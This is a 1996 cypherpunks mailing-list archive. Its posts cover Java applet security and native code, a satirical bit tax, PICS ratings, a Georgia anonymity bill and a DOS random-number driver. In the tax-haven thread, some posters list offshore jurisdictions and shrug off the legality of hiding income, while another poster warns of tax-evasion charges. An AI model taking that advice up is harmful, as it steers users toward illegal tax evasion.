>> don't think that the government will have any problem determining the
>> quantity of the information & since it will be encrypted anyway, I don't
>> see the privacy worries.

What a wonderful idea!  Everybody would Win with this.

Rich> Traffic analysis (though remailers would help).

What do you have to hide?

Rich> And what about mailbombing? If you're mailbombed, does your tax bill
Rich> skyrocket?

Of course.  The Government is much wiser at spending your money than
you are.  Since most mailbombing can be source blocked, the funds
raised from a mailbombing can be used on a Federal Training program
for computer administrators because you obviously cannot take care of
yourself.

Sites with mailing lists are not exempt, neither are Usenet sites.
The user fees can be raised to pay the taxes.  Mailing lists shouldn't
be free anyway.  The Usenet Oracle will be taxed too.  It's too
dangerous for a site to be giving out free advice without some kind of
Government Regulation.

Rich> I think information has to be free (of tax, anyway), because there is no
Rich> way to prove the utlility of information.

It doesn't matter.  It's a conspiracy by Netscape and Microsoft.  Since
taxation will be based on volume of information it follows logically
that browsing the web with Lynx or images turned off is income tax
evasion.  (Using gzip for FTP is also tax evasion).  It's your duty as
a law-abiding taxpaying citizen-unit to Pay Your Fair Share, and that
means browsing the Web with Netscape with all the extensions turned
on.

Be patriotic!  Put lots of 100k GIFs on your Home Page to Reduce The
Deficit!  Browse the WWW with Netscape for America!  Don't do it for
yourself, Do It For Your Children;  their future is at stake.

Microsoft is feeling threatened on its own turf by people FTPing free
Unix instead of paying big bucks for broken software.  What's good for
Microsoft is Good For America.  Let's keep American Jobs At Home.  We
can't have some upstart foreigner in Finland putting an honest
American company to shame.  FTP file transfers of Linux must be taxed.

Just to be fair, this tax ought to apply to everyone in the world.
Why should taxpaying American citizens have to pay the US government
to visit Yahoo when people in Europe get to see it for free?  Level
the playing field.

- The Unix Cypherpunk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Coverett <blake@bcdev.com>
Date: Sat, 4 May 1996 20:44:49 +0800
To: "cypherpunks@toad.com>
Subject: RE: Calling other code in Java applications and applets
Message-ID: <01BB397D.395BE6C0@bcdev.com>
MIME-Version: 1.0
Content-Type: text/plain


> I don't have any hints, but I think people need to be aware up front
> that calling native code from a Java applet disables
> any security that might otherwise be enforced for the applet.  

This, of course, presumes that the native code in question is less 
robust/trust-worthy than that Java runtime and the browser. It's
not obvious to me why this should be the case.

regards,
-Blake (who figures its all a reputation thing again)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 4 May 1996 22:27:33 +0800
To: jamesd@echeque.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <199605040652.XAA09692@dns1.noc.best.net>
Message-ID: <Pine.SUN.3.93.960504065216.21350A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 3 May 1996 jamesd@echeque.com wrote:

> >1)  Read as wide a variety of the stuff out there you can 
> >    (even the books by "dangerous crackpots").  
> >2)  Take a vacation to a tax haven you like because of what
> >    you've read about it.
> 
> What tax havens would you like, if you did business in tax 
> havens, which of course you do not ;-)

What's your anticipated application?

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 5 May 1996 03:44:38 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <Pine.SUN.3.93.960504013939.20344A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.960504074319.21902A-100000@crl14.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks

I wrote in reference:

> > >Today, virtually anyone on this list can afford these techniques.

> Actually, I disagree with Mr. Sandfort on this one.
> 
> Taxation of International Income is a tremendously complicated field.
> (You can get an LL.M. in international taxation alone for example).
> If your simply looking to pick a jurisdiction, that's not so hard.
> Neither is simply using a tax haven in simple ways or concealing skimmed
> or cash assets.  Actually structuring an internatinal business endeavor is
> a whole different ball game.
 
We don't really disagree.  What Black Unicorn writes is quite
correct IF ONE IS CONCERNED WITH LEGAL CORRECTNESS.  Not everyone
on this list could afford to do completely legal international
tax structuring.  I still stand by my statement, however, that
most list members could afford to use offshore techniques.  (If
you have a ton of money, by all means, hire Black Unicorn or
someone similarly situated, to help you with your planning.
Big money is a big target, andy you definitely need to have all
your i's dotted and t's crossed.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Sat, 4 May 1996 17:32:11 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199605040605.IAA19372@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


what is currently the best remailer-in-a-box out there?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 5 May 1996 03:46:46 +0800
To: jamesd@echeque.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <199605040652.XAA09692@dns1.noc.best.net>
Message-ID: <Pine.SUN.3.91.960504075446.21902B-100000@crl14.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Fri, 3 May 1996 jamesd@echeque.com wrote:
> What tax havens would you like, if you did business in tax 
> havens, which of course you do not ;-)

I haven't done any sort of survey lately, but I think the 
following jurisdictions are all good bets:

BANKING		Cayman Islands, Liechtenstein, Isle of Man,
		Canada(!) for some purposes, United States
		for non-US people and or nominee offshore
		corporations owned by anyone.

CORPS./TRUSTS	English speaking Caribbean countries, Hongkong
		in certain circumstances, Liechtenstein for
		its trust-like entities.

LIVING		Most anywhere that you like and that isn't your
		country of citizenship.  If I had the bucks, I
		would seriously look at Campione d'Italia.

I'd be curious to hear what Duncan Frissell and Black Unicorn
had to say on this question.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



		




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Sun, 5 May 1996 04:56:08 +0800
To: cypherpunks@toad.com
Subject: URLs for Capabilities
Message-ID: <adb1380100021004eb5b@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


I am preparing a talk for this morning at CP in PaloAlto. Here are some
relavant URLs.
http://www.agorics.com/agorics
http://www.agorics.com/agorics/allkey.html
http://www.cis.upenn.edu/~KeyKOS/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: abostick@netcom.com (Alan Bostick)
Date: Sun, 5 May 1996 05:08:19 +0800
To: perry@piermont.com
Subject: Re: Why I dislike Java.
In-Reply-To: <199605031303.JAA24332@jekyll.piermont.com>
Message-ID: <723ix8m9LAhG085yn@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199605031303.JAA24332@jekyll.piermont.com>,
"Perry E. Metzger" <perry@piermont.com> wrote:

> Jeff Weinstein writes:
> > 
> >   The Netscape Administration Kit will allow a site security admin
> > to create a configuration that disables Java, and does not allow the
> > user to enable it.  If your customers require netscape, perhaps this
> > is an option that will make you more comfortable.
> 
> It certainly makes me feel more comfortable. The problem I have is
> that I expect that increasingly pages will arise for which information
> can only be extracted with the use of Java. Some flunky from some desk
> will will come up and scream "what do you mean I can't get a copy of
> Foo Corporation's merger press release because we won't run some
> program! Thats bullshit! Do you know how much money the risk arb desk
> pulls in, you twit! This must never happen again! Fix it immediately!"
> 
> Luckily things aren't quite at that stage yet, but its only a matter
> of time. When you create a tool like this, you have a certain degree
> of, dare I say it, community responsibility. Once you've hyped the
> tool enough and made it ubiquitous, people at some point are going to
> claim that they *need* it, at which point the security people have no
> choice but to do something that gives them nightmares.

This, it seems to me, is the key issue.  

The Security Department isn't going to have time to test and certify the
applet code for Foo Corporation's fancy merger press release; the risk
arb desk is going to need to see it *right now*.

I hate saying things like "the answer is to educate the users" because
it is as close to a cop-out as you can get.  But educating the users has
to be at least part of the answer - and not just the users.  The
publicity and shareholder relations offices at Foo Corporation need to
know that putting out information for Wall Street needs to be in a form
that Wall Street can deal with safely.  If Java doesn't belong on the
trading floor, it doesn't belong in a press release either.

I suspect that the best way to get the message across would be for a
major security disaster - a big-time hack or perhaps just a Java-caused 
system failure - to take place.

(A near-future Wall Street techno-thriller about such a hack *might* do
the trick, but there's no guarantee it wouldn't just vanish into the
science fiction midlist.)
 
- -- 
Alan Bostick               | "The thing is, I've got rhythm but I don't have
mailto:abostick@netcom.com | music, so I guess I could ask for a few more 
news:alt.grelb             | things." (overheard)
http://www.alumni.caltech.edu/~abostick

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMYuB3uVevBgtmhnpAQGDXwMAv6fD4svaKKAPgcyyfRF6NONf/hira2Ao
Ix052uZ2SGd+xkuE1rqqm4BGY1AulLJWU7pSPN6KgbZ6mJO4+nF7xaUbavBHArGZ
R1gwfRtyzEumpknhYqV9IV4IE+UNRi9C
=39Ub
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 5 May 1996 06:05:45 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.rutgers.edu>
Subject: Re: PICS & CyberAngels
In-Reply-To: <01I4A3GEC4UU8Y56P8@mbcl.rutgers.edu>
Message-ID: <199605041600.JAA01162@netcom14.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


EAS:
>	In view of the discussion of the possibility of PICS being required
>by law, plus that about the CyberAngels, I thought people might find it
>interesting that the CyberAngels home page has on it as one of their
>"responsibilities" making sure that all pages with sexual content - that
>pornography fetish again - have PICS or other (such as Safesurf...) ratings
>that would permit censorship of them.
>	If parents want to keep their children from seeing sexual material,
>that's the problem of the parents - it shouldn't be the problem of anyone else.
>If something I put out offends someone (e.g., some political speech I've made),
>that's the problem of the person it offends. Sexual material is no different.

this seems to suggest a misunderstanding of PICS either by you or
the "CyberAngels". PICS does not require any particular action by page owners
and is entirely based on that principle (there is a pretty good
argument it would be unconstitutional, impractical, idiotic, etc. if
it didn't). it defines a standard by
which ratings servers and queries are constructed and formatted.
anyone can rate any information. if the CyberAngels want to rate
all kinds of pages in cyberspace and set up their own rating service,
more power to them. the ratings do not restrict those who do not
choose the restrictions.

I hope we can get a new conventional wisdom going, in which people
who rant about saving children from the evils of cyberspace are
told to shut up and go start their own rating service. they can
blacklist as many sites as they want. but the real test will be
whether anyone CARES what they think.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 5 May 1996 04:56:07 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Edited Edupage, 25 April 1996
Message-ID: <m0uFjnB-00091dC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:55 PM 5/3/96 EDT, E. ALLEN SMITH wrote:
>From:	IN%"educom@elanor.oit.unc.edu" 25-APR-1996 21:40:28.52
>
>>FCC BOOSTS PROSPECT FOR SUPERNETS
>>The Federal Communications Commission may reserve a band of radio
>>frequencies to allow free and unlicensed transmissions at 25 megabit speeds
>>of large volumes of data within a group of buildings.  These so-called
>>"supernet" wireless services, which would operate at no more than one watt
>>of power in order to avoid interfering with neighboring supernets, could
>>then be connected by high-speed phone lines to the Internet, thus largely
>>bypassing local phone companies to get Net access.  (New York Times 25 Apr
>>96 C1)
>
>	If these are not covered by the regulations against encryption in
>the use of packet radio, this would seem to be an opening for such. Indeed,
>encryption of radio messages would appear to be rather critical for security.

FAIK, the prohibition on encryption applies only to hams transmitting on amateur radio frequencies.  It wouldn't cover this kind of thing.

I agree that encryption is going to be vital in this case, say 1024-bit RSA or better.  Thus encrypted, it would be even better if the there was also a law which prohibited _the government_ from picking up these transmissions or attempting to decrypt them.

Another useful purpose of such a "supernet" would be alternative telephone system competition.  At this data rate, we're talking about the equivalent of 500+ simultaneous phone call capacity.  That's enough to serve perhaps 5000 homes or more.


>>HARDWARE SOLUTION TO E-COMMERCE SECURITY
>>VLSI Technology and Tandem Computer's Atalla are developing chip-level
>>security products to protect electronic transactions over the Internet and
>>intranets.  The products will incorporate DES, RSA and other encryption
>>technology, and the companies hope their joint venture will establish a
>>hardware-based security standard for electronic commerce.  (Information Week
>>15 Apr 96 p34)


Remember, however, that VLSI technology is the company that built Clipper...

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jordan Hayes <jordan@Have.You.Seen.My.Infomercial.COM>
Date: Sun, 5 May 1996 05:03:48 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <199605041609.JAA21395@Thinkbank.COM>
MIME-Version: 1.0
Content-Type: text/plain


	From unicorn@schloss.li Fri May  3 23:23:21 1996

	Accounting costs as a result of a deduction based,
	multi-tiered, progressive, and supplimented system of income
	taxation are silly.

By the way, the IRS (in spite of it's shortcomings) is (by far) the
most efficient tax collecting organization among the major economic
powers.  It costs roughly $0.50 per $100 collected.  Canada is second
at about $1, Germany (for instance) is at about $7, mostly because they
don't have payroll deductions.

/jordan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jordan@Thinkbank.COM (Jordan Hayes)
Date: Sun, 5 May 1996 05:25:22 +0800
To: cypherpunks@toad.com
Subject: Re: CryptoAnarchy: What's wrong with this picture?
Message-ID: <9605041621.AA17975@blood.Thinkbank.COM>
MIME-Version: 1.0
Content-Type: text/plain


	From sandfort@crl.com Fri May  3 21:52:50 1996

	At 11:31 AM 5/3/96 -0700, brerrabbit@alpha.c2.org wrote:

	>Do tell.  How would someone, just for instance, who is considering
	>leaving a "permanent" job for the higher compensation available to
	>contractors and consultants be able to structure a business in such a
	>way as to benefit from these techniques?

	2)  Take a vacation to a tax haven you like because of what
	    you've read about it.

I'm confused as to how "merely" putting your after-tax (you *will*
declare this consulting revenue on your Schedule C, won't you?) bucks
in an offshore account will "save" you money.  This only "works" if you
are able to use what you've taken away to advantage; you may generate a
tax "savings" on those gains.  Oh, and it also only works if you are
willing to expose yourself to being arrested at some point for tax
evasion.

This is silly; there are legitimate reasons for structuring business
efforts in other tax juristictions.  Avoiding income tax on your
primary source income isn't one of them.

My answer to the original question: save your $1k you'd send to Sandy
for the "advice" (plus travel associated with finding your 'haven') and
open a SEP.

/jordan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mjenkins@algebra.com (Mike Jenkins)
Date: Sun, 5 May 1996 04:13:09 +0800
To: nobody@mail.uu.net
Subject: Re: LACC: proposed anti-pseudospoofing law in Georgia
In-Reply-To: <199605021952.MAA18471@netcom16.netcom.com>
Message-ID: <199605041518.KAA05839@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Can you please post the text of the bill?

Thank you,

	...

Vladimir Z. Nuri wrote:
> 
> this law got a little notice here although I didn't notice people
> considering its identity aspects in particular.
> 
> this proposed law in Georgia 
> would make it illegal to have a login name other than 
> your legal name, as I understand it.
> 
> I consider it rather silly, naive, and unenforcable, 
> but it does suggest a few things:
> 
> 1. lawmakers are starting to notice the internet bigtime.
> 2. its starting to freak them out.
> 3. the identity issues raised by cyberspace have significant 
> social implications and will not go away quietly.
> 4. there are some legitimate reasons to require ID in some places
> in cyberspace.
> 
> of course I will be flamed on 4, but my position is, has always
> been the following: both anonymous and "identified" communication
> have their places. I am not suggesting that either one is superior
> a priori.  however each has different uses. some things that
> are possible in one are not possible in the other, etc.
> 
> I think it is reasonable
> for people who create/maintain forums or other cyberspace services
> to demand, and be able to enforce, that you use your real 
> identity if they choose. likewise, you are free not to join these
> place or use these services. I think anyone should be free
> to create alternatives that spit in the face of these restrictions.
> let the market decide what is most viable in given situations.
> 
> I suspect that we are going to see some laws being passed trying
> to regulate cyberspace that are really ridiculous. it will take
> the lawmakers awhile to figure out what they can and can't get away with
> and when their opinions are or are not relevant to what happens.
> 
> meanwhile, if the internet really is robust, their irrelevant
> posturings should not make much difference, although I am *not* 
> advocating that people resign themselves to these laws, only that
> if they pass the situation is not necessarily catastrophic or
> apocalyptic.
> 
> 
> ------- Forwarded Message
> 
> 
> - ------- Forwarded Message
> 
> Date:      Tue, 30 Apr 1996 11:31:52 -0400 (EDT)
> From: merkaba@styx.ios.com
> Reply-To: snetnews@xbn.shore.net
> To: Multiple recipients of list SNETNEWS <SNETNEWS@XBN.SHORE.NET>
> Subject:   INTERNET POLICE (fwd)
> 
> 
> 
> 
> - - ---------- Forwarded message ----------
> Date: Fri, 26 Apr 1996 21:44:53 -0400
> From: Ronald Pearce <ronald@cybercomm.net>
> To: merkaba@styx.ios.com
> Subject: INTERNET POLICE
> 
> >
> >It is being dubbed the Internet Police Law.  Georgia's state government is
> >beginning to catch a little net-heat because of a new law signed by the
> >Governor last week which, according to some, CRIMINALIZES the use of e-mail
> >addresses which don't properly identify a person, as well as the practice of
> >linking to another web page by name without first obtaining permission to
> >link.  
> >
> >If anyone cares to see information and commentary on this new law, feel free
> >to browse over to www.kuesterlaw.com.  I would love to know what everyone
> >thinks about the constitutionality of this bill, as well as any other comments.
> >
> >Thanks.
> >jk
> >Jeffrey R. Kuester, Esq.         Patent, Copyright, & Trademark Law
> >6445 Powers Ferry Road, Suite 230, Atlanta, Georgia 30339
> >Ph (770) 951-2623  Fax (770) 612-9713
> >E-mail: kuester@kuesterlaw.com
> >WWW: http://www.KUESTERLAW.com   (The Technology Law Resource)
> >
> >---------------------------------------------------------------
> 
> 
> 
> 
> - - ->   SNETNEWS Mailing List & Fidonet Echo
> - - ->   Post to:  listserv@xbn.shore.net    
> - - ->             subscribe snetnews        
> 
> 
> 
> - ------- End of Forwarded Message
> 
> 
> ------- End of Forwarded Message
> 
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Sun, 5 May 1996 07:24:48 +0800
To: blake@bcdev.com (Blake Coverett)
Subject: Re: Calling other code in Java applications and applets
In-Reply-To: <01BB397D.395BE6C0@bcdev.com>
Message-ID: <199605041734.KAA24761@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


No that wasn't  my point (that the native code is less
trustworthy than the Java runtime.)    My point was just
that any security measures that restrict applets do not restrict
anything that an applet causes to happen via a native method. 

For example one security restriction is that applets aren't allowed
to read files.   If an applet calls a native method then that native
method can read any files it wants.    I'm talking about the model,
not about the quality of implementation.     I'm not saying it's 
a bad or untrustworthy thing to do (call native methods), I just
thought it was worthwhile to point out that once you call a DLL 
from an applet, you have effectively chosen to disable the application
level SecurityManager.  It's your call as to whether this is a problem
or not.   

Marianne




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: minow@apple.com (Martin Minow)
Date: Sun, 5 May 1996 06:27:01 +0800
To: cypherpunks@toad.com
Subject: Re: Calling other code in Java applications and applets
Message-ID: <v02140b00adb14064cf1e@[17.128.200.85]>
MIME-Version: 1.0
Content-Type: text/plain


Marianne Mueller (mrm@netcom.com) writes that

>
>people need to be aware up front
>that calling native code from a Java applet disables
>any security that might otherwise be enforced for the applet.
>

Would it be more accurate to state that native code called by a
Java applet disables Java virtual machine security, but is still
bound by security policies enforced by the operating system itself?

It would be most unfortunate if a browser run by an unprivileged
user could attain "root" privileges by running a Java applet that
called an appropriate (or inappropriate) native method.

Of course, on inherently unprotected systems (PC's), there is
indeed no protection.  Perhaps Java will cause vendors to improve
overall operating system robustness.

Martin Minow
minow@apple.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Sun, 5 May 1996 07:07:28 +0800
To: minow@apple.com (Martin Minow)
Subject: Re: Calling other code in Java applications and applets
In-Reply-To: <v02140b00adb14064cf1e@[17.128.200.85]>
Message-ID: <199605041755.KAA26669@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> >people need to be aware up front
> >that calling native code from a Java applet disables
> >any security that might otherwise be enforced for the applet.
> >
> 
> Would it be more accurate to state that native code called by a
> Java applet disables Java virtual machine security, but is still
> bound by security policies enforced by the operating system itself?
> 
> It would be most unfortunate if a browser run by an unprivileged
> user could attain "root" privileges by running a Java applet that
> called an appropriate (or inappropriate) native method.

yes, that's exactly the case.  I wouldn't call it the virtual machine
security, though, but the application security, since the applet
restrictions are enforced at the application level by the SecurityManager.
(the browser is the application in this case) 

Whether or not this is a problem depends on the quality of implementation
of the DLL, and whether or not you care about this level of insecurity,
given that the browser and other software runing on the machine
may or may not be secure.   People routinely "click here" to download
and install some plug-in, so probably those folks are willing to place
their bets and take their chances.  

Note that in all this I'm not claiming that the Java setup as
currently implemented is without bugs.  I'm just talking about the model. 

As far as the Java applet sandbox goes, I think we can do a better job of
specifying a minimal TCB and enforcing the applet restrictions at the
application level.   There are people who think that the sandbox model
itself is not do-able.  I think reasonable people can disagree on that
point.   

> 
> Of course, on inherently unprotected systems (PC's), there is
> indeed no protection.  Perhaps Java will cause vendors to improve
> overall operating system robustness.
> 

If there's a market for security, then vendors will respond to that. 
I think it's interesting that the internet might provide that
market demand.    Other people on this list who have worked on 
secure products can probably testify as to whether or not customers
were willing to wait longer and pay more for higher quality, more
secure software, or if they're more interested in buying something today
that provides some needed feature.    I'm not saying this is good
or bad - I'm just observing that market forces are real.    Another
way of saying this is, perhaps software that previously was only
deployed in special-purpose applications will move into consumer
mainstream.   

Marianne





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 5 May 1996 06:46:38 +0800
To: Jordan Hayes <jordan@Thinkbank.COM>
Subject: Re: CryptoAnarchy: What's wrong with this picture?
In-Reply-To: <9605041621.AA17975@blood.Thinkbank.COM>
Message-ID: <Pine.SUN.3.91.960504110214.5309A-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punk:

On Sat, 4 May 1996, Jordan Hayes wrote:

> I'm confused as to how "merely" putting your after-tax (you *will*
> declare this consulting revenue on your Schedule C, won't you?) bucks
> in an offshore account will "save" you money.  This only "works" if you
> are able to use what you've taken away to advantage; you may generate a
> tax "savings" on those gains.  Oh, and it also only works if you are
> willing to expose yourself to being arrested at some point for tax
> evasion.

The proper way to punctuate the foregoing paragraph is to end it
with a period after "I'm confused."
 
> This is silly; there are legitimate reasons for structuring business
> efforts in other tax juristictions.  Avoiding income tax on your
> primary source income isn't one of them.

This is Jordan's value judgment.  Your mileage may vary.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 5 May 1996 07:15:49 +0800
To: cypherpunks@toad.com
Subject: Re: "Bit Tax" proposed by satan@hell.gov
Message-ID: <m0uFlts-00094fC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:53 PM 5/3/96 -0700, Timothy C. May wrote:
>At 11:13 PM 5/3/96, Steve Reid wrote:
>
>>The problem with a tax on data is that it would be *extremely* unfair.
>
>Chill out, it's not a real proposal.

I just read the first few pages of the url, and skimmed a few more, and it's obviously a pile of socialist, politically-correct, statist liberal claptrap.  They're more interested in maintaining their little interdependant world than anything else.

Jim Bell
jimbell@pacifier.com
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Sun, 5 May 1996 05:37:19 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Why I dislike Java. (was Re: "Scruffies" vs. "Neats")
Message-ID: <01BB39B7.AF3F9A00@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


E. Allen Smith wrote:

> From:	IN%"perry@piermont.com"  3-MAY-1996 16:49:35.61
>
> >The users can't afford not to have the numbers they are watching not
> >in front of them, even for brief periods. Its a real problem.
>
> 	Hmm.... has anyone ever created a specialized computer (or computer
> running a specialized program) that would put multiple screens on the 
same
> screen, perhaps with some GUI manipulation capabilities? If they're 
trying to
> read Netscape material while watching the other numbers, they're then in 
the
> exact same situation from their viewpoint.

Actually, this is the kind of application that seems ideal for X-Windows. 
 There are a lot more, but it has never really caught on in the PC world, 
which is a shame since it makes much more sense than many of the solutions 
people have come up with over the years.

-Pete Loshin





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Sun, 5 May 1996 06:00:19 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: PICS & CyberAngels
In-Reply-To: <01I4A3GEC4UU8Y56P8@mbcl.rutgers.edu>
Message-ID: <YlWsKRC00YUzIAZLln@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 3-May-96 PICS & CyberAngels by "E.
ALLEN SMITH"@ocelot. 
>         In view of the discussion of the possibility of PICS being required
> by law, plus that about the CyberAngels, I thought people might find it
> interesting that the CyberAngels home page has on it as one of their
> "responsibilities" making sure that all pages with sexual content - that
> pornography fetish again - have PICS or other (such as Safesurf...) ratings
> that would permit censorship of them.

Indeed. Under SafeSurf, I've rated the fight-censorship mailing list
archive site as suitable for all ages, which I believe it is, though the
CyberAngels think otherwise. I wonder what will happen now? SafeSurf is
supposedly sending me "an end-user license agreement" to sign...

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sun, 5 May 1996 08:44:07 +0800
To: cypherpunks@toad.com
Subject: Re: Justice Department looking for ISP's
In-Reply-To: <199605041827.NAA15073@shiva.ee.siue.edu>
Message-ID: <Pine.SUN.3.92.960504130029.20345B-100000@linda.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 4 May 1996, Anonymous wrote:

> >From: <casey@justice.usdoj.gov>
> >To: Firewalls@GreatCircle.COM
> >Subject: Firewalls-Digest V5 #289
> >Date: Fri, 3 May 1996 14:03:09 -0400 (EDT)
> >Sender: firewalls-owner@GreatCircle.COM
> >
> >I am looking for a list of all the Internet
> >Service Providers world-wide.  Can anyone point me
> >in the right direction?

Isn't that at ftp.fuck-the-doj.com, in /dev/null?


Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@ee.siue.edu (Anonymous)
Date: Sun, 5 May 1996 07:10:20 +0800
To: cypherpunks@toad.com
Subject: Justice Department looking for ISP's
Message-ID: <199605041827.NAA15073@shiva.ee.siue.edu>
MIME-Version: 1.0
Content-Type: text/plain


>From: <casey@justice.usdoj.gov>
>To: Firewalls@GreatCircle.COM
>Subject: Firewalls-Digest V5 #289
>Date: Fri, 3 May 1996 14:03:09 -0400 (EDT)
>Sender: firewalls-owner@GreatCircle.COM
>
>I am looking for a list of all the Internet 
>Service Providers world-wide.  Can anyone point me 
>in the right direction?
>
>Thanks in advance,
>
>Mary L. Casey, Program Analyst
>Information Management &
>  Security Staff
>Information Resources Management
>Justice Management Division
>U.S. Dept of Justice






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Sun, 5 May 1996 06:24:26 +0800
To: cypherpunks@toad.com
Subject: NOISE.SYS v0.5.5 (Beta)
Message-ID: <199605041752.NAA06501@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



Latest NOISE.SYS (/dev/random for DOS) is available, with incomplete 
docs.  Reply with a subject "send noise"  (or you can wait a few days for
it to appear on an ftp site).  The file's about 80k, includes '386 
assembler source.
---
No-frills sig.
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Sun, 5 May 1996 08:15:09 +0800
To: abostick@netcom.com (Alan Bostick)
Subject: Re: Why I dislike Java.
In-Reply-To: <723ix8m9LAhG085yn@netcom.com>
Message-ID: <199605041918.OAA04031@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> I hate saying things like "the answer is to educate the users" because
> it is as close to a cop-out as you can get.  But educating the users has
> to be at least part of the answer - and not just the users.  The
